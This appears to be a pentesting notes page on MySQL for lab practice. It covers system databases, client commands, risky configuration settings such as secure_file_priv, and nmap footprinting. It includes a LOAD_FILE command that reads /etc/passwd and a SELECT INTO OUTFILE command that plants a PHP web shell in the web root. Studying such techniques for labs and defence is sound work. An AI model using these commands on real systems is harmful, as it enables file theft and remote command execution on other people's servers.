DiscordHackTheBoxTryHackMeGitHub

MySQL

About

MySQL is an open-source SQL relational database management system developed and supported by Oracle. A database is simply a structured collection of data organized for easy use and retrieval. Default MySQL port is 3306. The most important databases fot the MySQL are the system schema (sys) and information schema (information_schema). The system schema contaions tables, information, and metadata necessary for management. The information schema contains metadata which mainly retrieved from the system schema database.

Databases

MySQL has default system databases that can help us understand the structure of all the databases that may be hosted on a target server.

Database
Description

mysql

Contains tables with required info for the server

information_schema

Database metadata

performance_schema

Low level monitoring MySQL Server execution

sys

Objects that helps devs to use data from performance_schema database

MySQL Useful Commands

Command
Description

mysql -u <user> -p<password> -h <IP address>

Connect to the MySQL server. There should not be a space between the '-p' flag, and the password.

show databases;

Show all databases

use <database>;

Select one of the existing databases

show tables;

Show all available tables in the selected database

show columns from <table>;

Show all columns in the selected database

select * from <table>;

Show everything in the desired table

select * from <table> where <column> = "<string>";

Search for needed string in the desired table

select LOAD_FILE("/etc/passwd");

NOT DEFAULT. Reading local files

SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

NOT DEFAULT. Writing local files

CMD Interacting

Linux

mysql -u carni17 -psuperkek123 -h 13.13.13.13

Windows

mysql.exe -u carni17 -psuperkek123 -h 13.13.13.13

Dangerous Settings

Config File Location

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d'

  • user - Sets which user the MySQL service will run as

  • password - Sets the password for the MySQL user

  • admin_address - The IP address on which to listen for TCP/IP connections on the administrative network interface

  • debug - This variable indicates the current debugging settings

  • sql_warnings - This variable controls whether single-row INSERT statements produce an information string if warnings occur

  • secure_file_priv - This variable is used to limit the effect of data import and export operations. If empty - variable have no effect. If NULL - server disables import/export. If directory - import/export is limited to directory.

Show variable

show variables like "secure_file_priv";

Tips2Hack

  1. Nmap Basic Footprinting

sudo nmap 13.13.13.13 -sV -sC -p3306 --script mysql*
PreviousDatabasesNextMSSQL

Last updated